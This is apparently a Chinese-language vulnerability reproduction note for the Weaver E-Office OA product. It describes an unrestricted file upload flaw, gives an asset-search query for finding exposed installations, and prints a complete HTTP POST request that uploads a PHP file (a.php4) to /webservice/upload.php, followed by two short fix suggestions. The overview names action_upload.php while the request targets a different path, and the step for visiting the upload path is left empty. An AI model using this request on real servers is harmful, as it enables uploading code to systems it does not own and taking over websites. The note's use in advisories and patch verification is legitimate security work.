产品介绍

泛微E-office是⼀款针对中小型组织开发的轻量级OA产品，具有开箱即用、应用丰富、配置灵活的特点，能够满足日常办公审批、考勤、流程、知识文档、公文、人事、即时通讯等需求。同时，它支持私有云部署，确保数据安全可控，并可以在PC端、APP、企业微信、钉钉等多个平台上使用。

漏洞概述

泛微OA E-Office 在 action_upload.php 中上传文件过滤不严格导致允许无限制地上传文件，攻击者可以通过该漏洞直接获取网站权限

资产测绘

app=“泛微-EOffice”

漏洞复现

POST /webservice/upload.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 160
Content-Type: multipart/form-data; boundary=4f432185edc34d687901a1b9853fbb88

--4f432185edc34d687901a1b9853fbb88
Content-Disposition: form-data; name="file"; filename="a.php4"

<?php phpinfo();?>
--4f432185edc34d687901a1b9853fbb88--

访问上传路径：

修复建议

关闭互联网暴露面或接口访问限制
升级至安全版本